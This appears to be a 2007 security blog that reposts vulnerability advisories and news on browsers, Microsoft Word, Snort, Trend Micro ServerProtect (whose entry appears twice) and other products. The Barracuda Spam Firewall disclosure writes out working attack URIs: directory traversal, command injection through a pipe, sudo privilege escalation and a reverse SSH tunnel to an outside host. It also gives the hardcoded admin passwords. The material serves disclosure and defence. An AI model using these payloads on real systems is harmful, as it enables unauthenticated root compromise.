Published: 2007-02-26,
Last Updated: 2007-02-26 23:25:38 UTC
by Swa Frantzen (Version: 3)
What happens when an adept of the dark side of the force looks at the documentation on javascript's onUnload() function ?
Take a look for yourself and come back, we won't go anywhere:
So something that gets called no matter how the user tries to get away from a web page. Imagine what pages you might want to get away from ...
As the MSDN article says, adding a window.open() call in such a routine becomes a nightmare for the visitor as (s)he'll never manage to get away on his/her own. Pop-up blockers should -if all goes right- detect and prevent that one case. But it gets worse, how about "location = self.location;" ? Right, the visitor doesn't go away at all.
Is there anything new to this? Not as such, it's been known for years and was e.g. discussed in August of 2005 on full disclosure mailing lists.
One would assume open discussion of such a function where it's being labeled as potentially evil would cause security conscious developers to take note of such a dangerous function and severely limit it's possibilities, or better yet to get rid of it altogether.
Yet there seems to have been no such luck. Worse, there seems to have been renewed attention form those using the dark side as evidenced by these recent reactions:
MSIE 7:
CVE-2007-1091 (mitre) or
CVE-2007-1091 (nist)
"Microsoft Internet Explorer 7 allows remote attackers to prevent users from leaving a site, spoof the address bar, and conduct phishing and other attacks via onUnload Javascript handlers. "
We've henve updated the table tracking the known vulnerabilities in Microsoft products.
Firefox:
US-CERT Vulnerability Note VU#393921"Mozilla Firefox fails to properly handle JavaScript onUnload events. Specifically, Firefox may not correctly handle freed data structures modified in the onUnload event handler possibly leading to memory corruption. By convincing a user to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), an attacker may be able to execute arbitrary code with the privileges of the user."
Firefox seems to have fixed it in versions 2.0.0.2 and 1.5.0.10
Personally I've a hard time to see how supporting onUnload() matches with statements such as:
"Put safety first.
Robust new Internet Explorer 7 architecture and improved security features help protect you against malicious software, and help to keep your personal data safe from fraudulent websites and online phishing scams." (taken from http://www.microsoft.com/windows/products/winfamily/ie/default.mspx )
Firefox has a "security is important"
statement just as well.
Best course of action: disable scripting, but most of you can't or don't want to do that. The second best alternative might be to use extensions such as
NoScript in Firefox that allows more selective control of who gets to do remote code execution in your browser. Yes that's what allowing java, VBscript and javascript basically is: allowing random websites to hand your browser code to execute ...
--
Swa Frantzen -- NET2S
Labels: http, Vulnerability
When the Blue Screen of Death, really means death.
===================================================
By Lewis Page → More by this author
Published Monday 26th February 2007 12:15 GMT
Get The Register's new weekly newsletter for senior IT managers delivered to your inbox, click here.
Analysis Everyone knows the differences between Windows and other operating systems. Steve Jobs has recently spent colossal sums telling us that most malware is written for Windows; also that using Windows is no fun and, even worse, seems to involve wearing a tie.
Those acquainted with the more foam-lipped Linux fanciers will also be familiar with the position that Windows use is morally corrupt, indicative of sexual perversion, and causes cancer.
A lot of customers keep buying from Microsoft, however. One may want to deploy a particular kind of hardware, perhaps used only by a few organisations. It may well be that you can only get the associated software from the hardware maker, and the vendor in question doesn't provide anything other than Windows-based machines.
One type of hardware where this is happening more and more is warships.
This shift has already been heavily criticised. Nonetheless, BAE Systems subsidiary Insyte, the UK's sole provider of warship command systems, has decided to standardise on Win2k (this was during the company's former incarnation as AMS).
The Type 45 destroyers now being launched will run Windows for Warships: and that's not all. The attack submarine Torbay has been retrofitted with Microsoft-based command systems, and as time goes by the rest of the British submarine fleet will get the same treatment, including the Vanguard class (V class). The V boats carry the UK's nuclear weapons and are armed with Trident ICBMs, tipped with multiple H-bomb warheads.
All this raises a number of worrying issues. First up is basic reliability and usability. Most of us have stared in helpless despair at the dreaded blue screen; how much worse would you feel if that wasn't just your desktop gone but your combat display, and it really was the screen of death?
Surely we can't have our jolly tars let down by possibly untrustworthy, difficult to use kit such as Windows? Especially when you reflect that cost is not an issue. When you're buying destroyers at £1bn per hull, the price difference between 26 PCs and the same number of Sun workstations barely shows up.
....rest of article on
The Register .
Labels: Microsoft, Military
Barracuda Networks Spam Firewall Multiple Vulnerabilities Bugtraq ID: 19276
Class: Unknown
Remote: Yes
Local: No
Published: Aug 01 2006 12:00AM
Updated: Aug 08 2006 10:46PM
Credit: Greg Sinclair has been credited with the discovery of these vulnerabilities.
Vulnerable: Barracuda Networks Barracuda Spam Firewall 3.3.03.055
Barracuda Networks Barracuda Spam Firewall 3.3.03.053
Barracuda Networks Barracuda Spam Firewall 3.3.01.001
Spam Firewall is prone to multiple vulnerabilities, including a directory-traversal issue, access-validation issue, and a remote command-execution issue.
A remote attacker can exploit these issues to gain access to potentially sensitive information and execute commands in the context of the affected application.
-------
Matthew Hall (lists ecsc co uk)
Severity: High - Full system compromise possible
Date: 04 August 2006
Discovered by: Matthew Hall (matt (at) ecsc.co (dot) uk ) (Credits for original discovery to Greg Sinclair)
Discovered on: 03 Aug 2006
Summary:
Lack of input sanitisation in the Barracuda spam firewall
web interface allows execution of commands by unauthenticated users.
Combined with priviledge elevation techniques, execution of commands as
the root user is possible allowing a full system compromise.
Details:
In a follow-up investigation to bid 19276 - 'Barracuda Vulnerability:
Arbitrary File Disclosure [NNL-20060801-02]' by Greg Sinclair, further
investigation was performed by the Internet Defence Security Team and
several extra vulnerabilities were discovered, which when leveraged with
privilege escalation techniques allowed the remote execution of commands
as the root user without any authentication.
The original discovery by Greg Sinclair showed that it was possible to
open arbitrary files, either owned by the user/group 'nobody:nogroup' or
with world-read access, through the web interface using a path
sanitation vulnerability in preview_email.cgi, e.g:
https://
/cgi-bin/preview_email.cgi?file=/mail/mlog/../tmp/back
up/periodic_config.txt.tmp
Access to the path '/cgi-bin/preview_email.cgi' does not require any
authentication.
Using this vulnerability, it is also possible to use the pipe character
(|) to redirect the stdout of any programs run, to the stdin of the file
open function to print the output of the command back to the web
interface, e.g:
https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/l
s%20-la%20/|
It was then possible to leverage further privileges, as the user the
http daemon runs as (nobody), is granted root level access to several
system commands via the use of sudo, e.g:
https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../usr/b
in/sudo%20touch%20/foo|
(Repeating the previous command should then show that the file 'foo' has
been created with root permissions in '/').
The commands allowed (this is not a canonical list) include:
mkdir, mv, cp, kill, ls, ln, chown, chmod, rm, echo, cat
(aswell as access to several 'wrapper' scripts in
/home/emailswitch/code/firmware/current/bin/)
Access to such commands as a chown and chmod allowed further privilege
escalation by setting the 'suid' bit on several other system programs,
which could then be executed through the webinterface, without the use
of sudo, and would run with root priviledges.
As such, a complete system compromise is possible remotely through the
web interface without any authentication.
It was also noted in bid 19276 - 'Barracuda Vulnerability: Hardcoded
Password [NNL-20060801-01]' a hardcoded 'guest' user password existed,
which was 'bnadmin99'.
During further investigation it was noted that there was also a
hard-coded 'admin' user password (this is the admin user for the web
interface), which is only possible to use if the httpd environment
variable 'REMOTE_ADDR' equals '127.0.0.1'.
If this case is true, then it is possible to login to the web interface
as the admin user using the password 'adminbn99'.
In order to gain elevated privileges to login to the web interface as
the admin user, it is possible to bind a reverse ssh shell which would
eventually satisfy the 'remote_addr == localhost' check.
It was possible to expose the ssh rsa public key, which then could be
copied to a users' '.ssh/authorized_keys2' on a local machine, e.g:
https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/c
at%20/home/emailswitch/code/config/id_rsa.pub|
With the public key in the authorized_keys2 file, it was then possible
to initiate the reverse shell from the web interface, e.g:
https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../usr/b
in/ssh%20-T%20-i%20/home/emailswitch/code/config/id_rsa%20-R%208080:loca
lhost:443%20@|
It was them possible to login to 'https://127.0.0.1:8080/' with the
username of 'admin' and password of 'adminbn99' and manage the device as
an administrator.
It was noted that the original file input sanitation vulnerability seems
to have been 'silently' fixed by Barracuda Networks (as of 11pm GMT
03/08/06), which mitigates the attacks above.
So far, no advisories or update notices can be found on their website,
and the version numbers of the affected software remains the same.
Recommendations:
We agree with Greg Sinclair's statement that the web interface should
never be made accessible from untrusted networks like the Internet.
The web interface on the Barracuda Spam Firewall has a history of
similar issues, so we believe that it is highly likely that more
vulnerabilities will be found in the future.
Exploit
Attackers can exploit these issues via a web client.
The following proof-of-concept URI is available.
/data/vulnerabilities/exploits/BarracudaDirectoryTraversalVulnerabilityAugust12006.html
/data/vulnerabilities/exploits/BarracudaRemoteCommandAugust032006.html
/data/vulnerabilities/exploits/BarracudaSpamFireWallExploitAugust082006.pl
Versions 3.3.01.001 to 3.3.03.055 are vulnerable to these issues.Labels: Appliance, Email, Spam, Vulnerability
SecurityTracker Alert ID: 1017639
SecurityTracker URL: http://securitytracker.com/id?1017639
CVE Reference: CVE-2007-0208 , CVE-2007-0209
Date: Feb 13 2007
Impact: Execution of arbitrary code via network, User access via network
Fix Available: Yes Vendor Confirmed: Yes
Advisory: Microsoft Security Bulletin
Version(s): 2000, 2002, 2003, 2004 for Mac, 2004
Description: Two vulnerabilities were reported in Microsoft Word. A remote user can cause arbitrary code to be executed on the target user's system.
A remote user can create a document with a specially crafted macro that, when loaded by the target user, will bypass the macro security warning and execute arbitrary code on the target system [CVE-2007-0208]. The code will run with the privileges of the target user.
A remote user can create a document with a specially crafted drawing object, when loaded by the target user, will trigger a memory corruption error and execute arbitrary code on the target system [CVE-2007-0209]. The code will run with the privileges of the target user.
Microsoft Word 2007 is not affected.
Microsoft credits USAA with reporting the macro security bypass vulnerability.
Impact: A remote user can create a file that, when loaded by the target user, will execute arbitrary code on the target user's system.
Solution: The vendor has issued the following fixes:
Microsoft Word 2000:
http://www.microsoft.com/downloads/details.aspx?FamilyId=F1E61E6A-BE3D-4536-AF76-A11D5CE67199
Micr osoft Word 2002:
http://www.microsoft.com/downloads/details.aspx?FamilyId=A1CA8DD7-0622-4D66-A85F-A6586545EF9D
Microsoft Word 2003:
http://www.microsoft.com/downloads/details.aspx?FamilyID=882F8503-DA72-43C9-B556-A002EC58F289
Microsoft Word Viewer 2003:
http://www.microsoft.com/downloads/details.aspx?FamilyId=FB59798B-AFE2-4103-9991-CBDD7686F9AD
Microsoft Works Suite 2004:
http://www.microsoft.com/downloads/details.aspx?FamilyId=A1CA8DD7-0622-4D66-A85F-A6586545EF9D
Microsoft Works Suite 2005:
http://www.microsoft.com/downloads/details.aspx?FamilyId=A1CA8DD7-0622-4D66-A85F-A6586545EF9D
Microsoft Works Suite 2006:
http://www.microsoft.com/downloads/details.aspx?FamilyId=A1CA8DD7-0622-4D66-A85F-A6586545EF9D
Microsoft Office 2004 for Mac:
http://www.microsoft.com/mac/
The Microsoft advisory is available at:
http://www.microsoft.com/technet/security/bulletin/ms07-014.mspx
Vendor URL: www.microsoft.com/technet/security/bulletin/ms07-014.mspx
Labels: Advisory, Microsoft, Vulnerability
phpwcms-referer-security-bypass (26130)
Description:phpwcms is a Content Management System (CMS) written in PHP. phpwcms versions 1.2.5-DEV and prior and versions 1.1-RC4 and prior are vulnerable to header injection, caused by improper validation of the HTTP REFERER header by the act_formmailer.php and mail_file_form.php scripts. A remote attacker could exploit this vulnerability to use an affected system to send arbitrary email and spam messages.
Platforms Affected:Data General: DG/UX Any version
Hewlett-Packard Company: HP-UX Any version
Hewlett-Packard Company: Tru64 UNIX Any version
IBM: AIX Any version
Linux: Linux Any version
Microsoft Corporation: Windows 95
Microsoft Corporation: Windows 98
Microsoft Corporation: Windows 98 Second Edition
Microsoft Corporation: Windows Me
Microsoft Corporation: Windows XP
Microsoft Corporation: Windows 2000 Any version
Microsoft Corporation: Windows 2003 Any version
Microsoft Corporation: Windows NT 4.0
phpwcms: phpwcms 1.1-RC4 and prior
phpwcms: phpwcms 1.2.5-DEV and prior
Santa Cruz Operation, Inc.: SCO Unix Any version
SGI: IRIX Any version
Sun Microsystems, Inc.: Solaris Any version
Wind River Systems, Inc.: BSD Any version
Remedy:Apply the patch for this vulnerability, available from the phpwcms Web site. See References.
Consequences:Bypass Security
References:FrSIRT/ADV-2006-1556, phpwcms Remote Code Execution and Mail Form Security Bypass Vulnerabilities at http://www.frsirt.com/english/advisories/2006/1556.
phpwcms Forum, Fri Apr 21, 2006 16:11, Security Alert 1.2.6 CVS at http://www.phpwcms.de/forum/viewtopic.php?t=10958.
phpwcms Web site, phpwcms at http://www.phpwcms.de.
Standards associated with this entry:CVE-2006-7020: CRLF injection vulnerability in (1) include/inc_act/act_formmailer.php and possibly (2) sample_ext_php/mail_file_form.php in phpwcms 1.2.5-DEV and earlier, and 1.1 before RC4, allows remote attackers to modify HTTP headers and send spam e-mail via a spoofed HTTP Referer (HTTP_REFERER).
Reported:Apr 21, 2006
The information within this database may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Internet Security Systems X-Force) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
Copyright (c) 1994-2007 Internet Security Systems, Inc. All rights reserved worldwide.
Labels: Advisory, Bug, Vulnerability
OSVDB ID: 31592
Disclosure Date: Jan 1, 2006
Description: Check Point Firewall-1 contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when an attacker connects to port 18264 and accesses the internal certificate for the server, revealing the presence of the firewall. This may also disclose certificate revocation lists and other information resulting in a loss of confidentiality.
Vulnerability Classification: Remote/Network Access Required
Information Disclosure Attack
Loss Of Confidentiality
Exploit Available
Verified
Concern
Web Related
Products: Check Point Software Technologies, Inc. FireWall-1 Unknown or Unspecified
Solution: Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: Restrict access to the Internal Certificate Authority interface to internal hosts.
Manual Testing Notes: http://[target]:18264/
External References:Nessus Script ID:
22094 Vendor URL: http://www.checkpoint.com/products/firewall-1/index.html
Credit:OSVDB does not have information on who discovered this vulnerability. If you have credit information please send it to OSVDB Moderators
Vulnerability Status:
This entry was last updated on Feb 14, 2007. If you have additional information or corrections for this vulnerability please submit them to OSVDB Moderators.
Labels: Advisory, Firewall, Vulnerability
Interesting story about unauthorised people using Wifi in a secure zone, thereby creating a hole in the firewall.
--------------------------------------------------------------------------------------------
That nice, new Linksys wireless router might as well have been a ticking bombBy Anonymous
February 20, 2007
http://www.infoworld.com/article/07/02/20/09OPrecord_1.html
Between the latest firewall technology and advanced intrusion detection systems, IT professionals are breathing a little easier. This is a big mistake. It may be easier to protect the network from external attack these days, but the greatest security risks still come from inside the DMZ.
I work for a small, single-branch credit union in Minneapolis, and I am a one-man shop. If there’s a technical problem, I’m the guy who has to fix it. Once a year, auditors from a large accounting firm come in to perform an audit for our year-end financial statements. In the past, the only tech support I needed to provide was to set up a local printer they could use from their laptops. I couldn’t have given them access to my network if I wanted to, as their techs had their laptops locked down, and I couldn’t make any changes to their setup.
This year the accountants brought their own printer, so they didn’t need any assistance at all. Fine with me; I always have plenty to do. They showed up on Monday. Tuesday morning I arrived for work, opened up my laptop, and was suddenly asked if I would like to join wireless network xx-xx. I recognized the SSID as belonging to our auditors. My first thought was that one of them had left her laptop running in our boardroom overnight and had somehow screwed up the network settings, allowing it to accept connections. I immediately joined this network to see what was going on.
I had no trouble connecting to the router at 192.168.1.1 via port 80, and signing into the management console with the default password. I now had full access to the router, and I used nmap to scan all the computers connected to it. They all had the same ports open, including 135 and 139. All our financial data was potentially at risk.
Moments later I was running down the hall to the boardroom where the auditors were encamped. The first thing I saw, in the middle of the boardroom table, was a nice, new Linksys wireless router with a network printer cabled to it. Wow! It might as well have been a ticking bomb! How could their techs send them out with this equipment, especially configured this way, without security training?
When the accountants arrived half an hour later, I asked them if they were aware that the wireless router and the laptops were unsecured. They had no idea what I was talking about. They assured me that they weren’t even using the wireless functionality; sure enough, they were all cabled to it directly.
I phoned the auditors’ supervisor and told him I was seriously unhappy about our confidential financial data residing on laptops that were unsecured. He told me to calm down; even if the auditors’ laptops were on a wireless network, what could intruders do without a username and password to connect to the shares?
I don’t know about you, but my faith in Windows security on an open network, especially without additional firewall protection, isn’t that high. So, using the router’s Admin console, I disabled its wireless functionality altogether. I was further tempted to change the router’s password, or maybe leave some ominous messages on the auditors’ laptops just to prove a point. But I didn’t. They’ll have to learn their lesson the hard way, at a later date, with some other company’s data.
Labels: Insecurity, Wifi
Microsoft Windows 2000/XP/2003/Vista ReadDirectoryChangesW Informaton Leak
Title: Microsoft Windows 2000/XP/2003/Vista ReadDirectoryChangesW informaton leak
Author: 3APA3A, http://securityvulns.com
Affected: Microsoft Windows 2000,XP,2003,Vista
Exploitable: Yes
Type: Remote (from local network), authentication required (NULL session was not tested).
Class: Information leak
CVE: CVE-2007-0843
Intro:
It's very simple yet interesting vulnerability. ReadDirectoryChangesW()
API allows application to monitor directory changes in real time.
bWatchSubtree parameter of this functions allows to monitor changes
within whole directory tree with a root in monitored directory. To
monitor changes directory must be open with LIST access. Function
returns the list of modified files with a type of modification. File
modification refers to any modification of file record in directory.
Vulnerability: ReadDirectoryChangesW() doesn't check user's permissions for child directories.
Impact:
Any unprivileged user with LIST access to parent directory can monitor
any files in child directories regardless of files permissions. Because
by default Windows updates access time of any accessed files on NTFS
volumes, it makes it possible for user to gather information about
NTFS-protected files, their names and time of access to the files
(reading, writing, creation, deletion, renaming, etc). Filenames may
contain sensitive information or leak information about user's behavior
(e.g. cookies files).
Exploit:
http://securityvulns.com/files/spydir.c
Usage example:
spydir \\corpsrv\corpdata
I believe you find this utility useful regardless of this security
issue. It shows names of accessed/modified files for given directory in
real time (it seems there are non-security bugs in ReadDirectoryChangesW
implementations, e.g. you can not see non-ASCII names and some changes
are missing).
Compiled version can be downloaded from http://securityvulns.com/soft/
Workaround:
Avoid creation of more secure folder in less secure ones. Avoid using
sensitive data in documents naming.
Vendor (Microsoft):
January, 17 2006 Initial vendor notification
January, 18 2006 Vendor reply (assigned)
January, 26 2006 2nd vendor notification
February, 7 2006 3rd vendor notification
February, 9 2006 Vendor accepted vulnerability as "service pack class" for Windows XP and Windows 2003.
February, 9 2006 Accepted to wait until SP
February, 22 2006 Vendor gives SP timelines (late 2006 for W2K3
SP2 and 2007 for XP SP3)
February, 22 2007 Public release, because Windows Vista is released with same vulnerability.
Labels: Advisory, Microsoft, Vulnerability
CNN television this morning reported that every fighter completely lost all navigation and communications when they crossed the international date line. They reportedly had to turn around and follow their tankers by visual contact back to Hawaii. According to the CNN story, if they had not been with their tankers, or the weather had been bad, this would have been serious. CNN has not put up anything on their website yet.
Labels: Bug, Military, Vulnerability
Microsoft Internet Explorer HTML tag parsing denial of service
Vulnerability Summary CVE-2006-7030Description:
Microsoft Internet Explorer is vulnerable to a denial of service caused by a NULL pointer dereference that can occur when processing a malformed HTML document. A remote attacker could create a malicious Web page containing malformed HTML to cause a victim's browser to crash, if the victim could be persuaded to browse to the malicious page.
Note: It may also be possible for this vulnerability to be exploited for remote code execution.
Platforms Affected:
Microsoft Corporation: Microsoft Internet Explorer 6.0
Microsoft Corporation: Microsoft Internet Explorer 6.0 SP2
Microsoft Corporation: Windows 95
Microsoft Corporation: Windows 98
Microsoft Corporation: Windows 98 Second Edition
Microsoft Corporation: Windows Me
Microsoft Corporation: Windows XP
Microsoft Corporation: Windows 2000 Any version
Microsoft Corporation: Windows 2003 Any version
Microsoft Corporation: Windows NT 4.0
Remedy:
No remedy available as of June 2006.
Consequences:
Denial of Service
References:
BugTraq Mailing List, Fri May 26 2006 - 11:56:28 CDT, Re: [BuHa-Security] DoS Vulnerability in MS IE 6 SP2 at http://archives.neohapsis.com/archives/bugtraq/2006-05/0567.html.
BugTraq Mailing List, Thu May 25 2006 - 17:53:03 CDT, [BuHa-Security] DoS Vulnerability in MS IE 6 SP2 at http://archives.neohapsis.com/archives/bugtraq/2006-05/0546.html.
Standards associated with this entry:
BID-18112: Microsoft Internet Explorer Malformed HTML Parsing Denial of Service Vulnerability
Reported:
May 25, 2006
The information within this database may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Internet Security Systems X-Force) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
Copyright (c) 1994-2007 Internet Security Systems, Inc. All rights reserved worldwide.
Labels: Advisory, Microsoft, Vulnerability
2007-02-19 Sourcefire Advisory: Vulnerability in Snort DCE/RPC Preprocessor
2007-02-19 Sourcefire Advisory:
Vulnerability in Snort DCE/RPC Preprocessor
Summary:Sourcefire has learned of a remotely exploitable vulnerability in the Snort DCE/RPC preprocessor. This preprocessor is vulnerable to a stack-based buffer overflow that could potentially allow attackers to execute code with the same privileges as the Snort binary. Sourcefire has prepared updates for Snort open-source software to address this issue.
This vulnerability has been identified as CVE-2006-5276.
Snort Versions Affected:
Snort 2.6.1, 2.6.1.1, and 2.6.1.2
Snort 2.7.0 beta 1
This vulnerability also affects Sourcefire commercial products. For information and updates for Sourcefire products, please go to the Sourcefire support site.
Mitigating Factors: Users who have disabled the DCE/RPC preprocessor are not vulnerable. However, the DCE/RPC preprocessor is enabled by default.
Recommended Actions: Open-source Snort 2.6.1.x users are advised to upgrade to Snort 2.6.1.3 (or later) immediately.
Open-source Snort 2.7 beta users are advised to mitigate this issue by disabling the DCE/RPC preprocessor. This issue will be resolved in Snort 2.7 beta 2.
Workarounds:
Snort users who cannot upgrade immediately are advised to disable the DCE/RPC preprocessor by removing the DCE/RPC preprocessor directives from snort.conf and restarting Snort. However, be advised that disabling the DCE/RPC preprocessor reduces detection capabilities for attacks in DCE/RPC traffic. After upgrading, customers should reenable the DCE/RPC preprocessor.
Detecting Attacks Against This Vulnerability:Sourcefire will be releasing a rule pack that provides detection for attacks against this vulnerability.
FAQs: What does the update do?
Snort 2.6.1.3 (or later) removes the vulnerability by correcting the buffer overflow condition in the DCE/RPC preprocessor.
Has Sourcefire received any reports that this vulnerability has been exploited?
No. Sourcefire has not received any reports that this vulnerability has been exploited.
Acknowledgments:Sourcefire would like to thank Neel Mehta from IBM X-Force for reporting this issue and working with us to resolve it.
Labels: Advisory, Snort, Vulnerability
Trend Micro ServerProtect eng50.dll Stack Overflow Vulnerabilities February 20, 2007
CVE ID: CVE-2007-1070
Affected Vendor: Trend Micro
Affected Products:
ServerProtect for Windows 5.58
ServerProtect for EMC 5.58
ServerProtect for Network Appliance Filer 5.61
ServerProtect for Network Appliance Filer 5.62
TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability since January 16, 2007 by a pre-existing Digital Vaccine protection filter ID 5101. For further product information on the TippingPoint IPS: http://www.tippingpoint.com
Vulnerability Details: These vulnerabilities allow attackers to execute arbitrary code on vulnerable installations of Trend Micro ServerProtect. Authentication is not required to exploit these vulnerabilities.
The specific flaws exist within the StCommon.dll library and are reachable remotely through a DCE/RPC endpoint on TCP port 5168 bound to by the service SpntSvc.exe. The RPC endpoint is exposed from TmRpcSrv.dll with the following IDL stub information:
// opcode: 0x00, address: 0x65741030
// uuid: 25288888-bd5b-11d1-9d53-0080c83a5c2c
// version: 1.0
error_status_t rpc_opnum_0 (
[in] handle_t arg_1,
[in] long trend_req_num,
[in][size_is(arg_4)] byte overflow_str[],
[in] long arg_4,
[out][size_is(arg_6)] byte arg_5[],
[in] long arg_6
);
The upper half of the 'trend_req_num' DWORD RPC argument from above is used within TmRpcSrv.dll as an index into a call table. It must specifically be 0x0003 which results in a call to StRpcSrv.65671000(). The original arguments to the RPC endpoint are then passed to this called routine:
657416E6 mov eax, opnum0_call_table[eax*4]
657416ED test eax, eax
657416EF jnz short loc_65741707
...
65741707 loc_65741707:
65741707 mov [ebp+var_4], 0
6574170E mov edx, [ebp+sizeof_arg5]
65741711 push edx
65741712 mov edx, [ebp+arg5_array]
65741715 push edx
65741716 mov edx, [ebp+sizeof_overflow_str]
65741719 push edx
6574171A mov edx, [ebp+overflow_str]
6574171D push edx
6574171E push ecx ; trend_req_num
6574171F call eax ; call handler
The lower half of the 'trend_req_num' DWORD RPC argument is then used within StRpcSrv.dll as an index into a second call table. The value of this lower half controls the code flow to the following vulnerabilities and is hereto referred to as the 'subcode'.
Vulnerability One
A subcode value of 0x0004 results in a call to ENG_SetRealTimeScanConfigInfo() which subsequently calls through Eng50.61181940() -> Eng50.611819E0() -> Eng50.61190F60() and can result in a stack overflow due to an unbounded widechar string copy into a ~600 byte stack-based buffer as shown in the following relevant excerpt:
61190FC7 lea edx, [esp+288h+szShortPath]
61190FCB push esi
61190FCC push edx
61190FCD call _wcscpy
Vulnerability Two
A subcode value of 0x0047 results in a call to ENG_SendEMail() which can result in a stack overflow due to an unbounded widechar string copy into a ~2k stack-based buffer as shown in the following relevant excerpt:
6118A161 mov esi, [esp+780h+arg_0]
6118A168 lea eax, [esp+780h+var_778]
6118A16C push esi
6118A16D push eax
6118A16E call _wcscpy
The resulting stack overflows can be leveraged to execute arbitrary code under the privileges of the SYSTEM user.
Vendor Response:
Trend Micro has issued an update to correct this vulnerability. More details can be found at:
http://esupport.trendmicro.com/support/viewxml.do?ContentID=EN-1034290
Disclosure Timeline: 2007.01.16 Digital Vaccine released to TippingPoint customers
2007.02.01 Vulnerability reported to vendor
2007.02.20 Coordinated public release of advisory
Credit:
This vulnerability was discovered by Pedram Amini, TippingPoint Security Research Team.
Labels: Anti-Virus, Microsoft, Virus, Vulnerability
Trend Micro ServerProtect eng50.dll Stack Overflow Vulnerabilities February 20, 2007
CVE ID: CVE-2007-1070
Affected Vendor: Trend Micro
Affected Products:
ServerProtect for Windows 5.58
ServerProtect for EMC 5.58
ServerProtect for Network Appliance Filer 5.61
ServerProtect for Network Appliance Filer 5.62
TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability since January 16, 2007 by a pre-existing Digital Vaccine protection filter ID 5101. For further product information on the TippingPoint IPS: http://www.tippingpoint.com
Vulnerability Details: These vulnerabilities allow attackers to execute arbitrary code on vulnerable installations of Trend Micro ServerProtect. Authentication is not required to exploit these vulnerabilities.
The specific flaws exist within the StCommon.dll library and are reachable remotely through a DCE/RPC endpoint on TCP port 5168 bound to by the service SpntSvc.exe. The RPC endpoint is exposed from TmRpcSrv.dll with the following IDL stub information:
// opcode: 0x00, address: 0x65741030
// uuid: 25288888-bd5b-11d1-9d53-0080c83a5c2c
// version: 1.0
error_status_t rpc_opnum_0 (
[in] handle_t arg_1,
[in] long trend_req_num,
[in][size_is(arg_4)] byte overflow_str[],
[in] long arg_4,
[out][size_is(arg_6)] byte arg_5[],
[in] long arg_6
);
The upper half of the 'trend_req_num' DWORD RPC argument from above is used within TmRpcSrv.dll as an index into a call table. It must specifically be 0x0003 which results in a call to StRpcSrv.65671000(). The original arguments to the RPC endpoint are then passed to this called routine:
657416E6 mov eax, opnum0_call_table[eax*4]
657416ED test eax, eax
657416EF jnz short loc_65741707
...
65741707 loc_65741707:
65741707 mov [ebp+var_4], 0
6574170E mov edx, [ebp+sizeof_arg5]
65741711 push edx
65741712 mov edx, [ebp+arg5_array]
65741715 push edx
65741716 mov edx, [ebp+sizeof_overflow_str]
65741719 push edx
6574171A mov edx, [ebp+overflow_str]
6574171D push edx
6574171E push ecx ; trend_req_num
6574171F call eax ; call handler
The lower half of the 'trend_req_num' DWORD RPC argument is then used within StRpcSrv.dll as an index into a second call table. The value of this lower half controls the code flow to the following vulnerabilities and is hereto referred to as the 'subcode'.
Vulnerability One
A subcode value of 0x0004 results in a call to ENG_SetRealTimeScanConfigInfo() which subsequently calls through Eng50.61181940() -> Eng50.611819E0() -> Eng50.61190F60() and can result in a stack overflow due to an unbounded widechar string copy into a ~600 byte stack-based buffer as shown in the following relevant excerpt:
61190FC7 lea edx, [esp+288h+szShortPath]
61190FCB push esi
61190FCC push edx
61190FCD call _wcscpy
Vulnerability Two
A subcode value of 0x0047 results in a call to ENG_SendEMail() which can result in a stack overflow due to an unbounded widechar string copy into a ~2k stack-based buffer as shown in the following relevant excerpt:
6118A161 mov esi, [esp+780h+arg_0]
6118A168 lea eax, [esp+780h+var_778]
6118A16C push esi
6118A16D push eax
6118A16E call _wcscpy
The resulting stack overflows can be leveraged to execute arbitrary code under the privileges of the SYSTEM user.
Vendor Response:
Trend Micro has issued an update to correct this vulnerability. More details can be found at:
http://esupport.trendmicro.com/support/viewxml.do?ContentID=EN-1034290
Disclosure Timeline: 2007.01.16 Digital Vaccine released to TippingPoint customers
2007.02.01 Vulnerability reported to vendor
2007.02.20 Coordinated public release of advisory
Credit:
This vulnerability was discovered by Pedram Amini, TippingPoint Security Research Team.
Labels: Anti-Virus, Microsoft, Virus, Vulnerability
When is a backdoor really a backdoor?By John Leyden
Published Thursday 15th February 2007 16:46 GMT
Workplace smoking bans may be good for workers' health, but could open the back door to hackers.
In a recent social engineering test undertaken by UK-based security consultancy NTA Monitor, a tester was able to easily gain access to a corporate building through a back door that was left open for smokers. Once inside, the penetration tester was able to easily bluff his way into a meeting room, claiming the IT department had sent him. Even without a pass, he gained access unchallenged and was then able to connect his laptop to the firm's VoIP network via a telephone connection point.
NTA Monitor technical director Roy Hills comments: "It used to be that companies 'left the back door open' in terms of internet security. Now they are literally leaving their buildings open to accommodate smokers.
"Once inside a corporate building, an attacker can use social methods on employees to gain access to restricted areas and information unless a rigid staff pass system is in place," he added.
Smoking will be banned in all indoor public spaces in the UK in July 2007. In many other European countries, such as Spain, workplace smoking restrictions have already been applied. ®
Labels: Backdoor, Insecurity, News Article
Secunia Advisory: SA24180
Release Date: 2007-02-15
Critical: Moderately critical
Impact: DoS
Where: From remote
Solution Status: Vendor Patch
Software: Cisco Firewall Services Module (FWSM) 2.x
Description:A vulnerability and a security issue have been reported in Cisco Firewall Services Module, which can be exploited by malicious people to cause a DoS (Denial of Service) or bypass certain security restrictions.
1) An unspecified error exists when inspecting malformed SIP packets. This can be exploited to cause the device to reload by sending specially crafted SIP packets.
Successful exploitation requires that "SIP fixup" is enabled, which is the default setting.
2) A security issue when manipulating ACLs (Access Control Lists) that make use of object groups can corrupt ACLs, resulting in ACEs (Access Control Entries) being skipped or not evaluated in order, which can be exploited to bypass certain security restrictions.
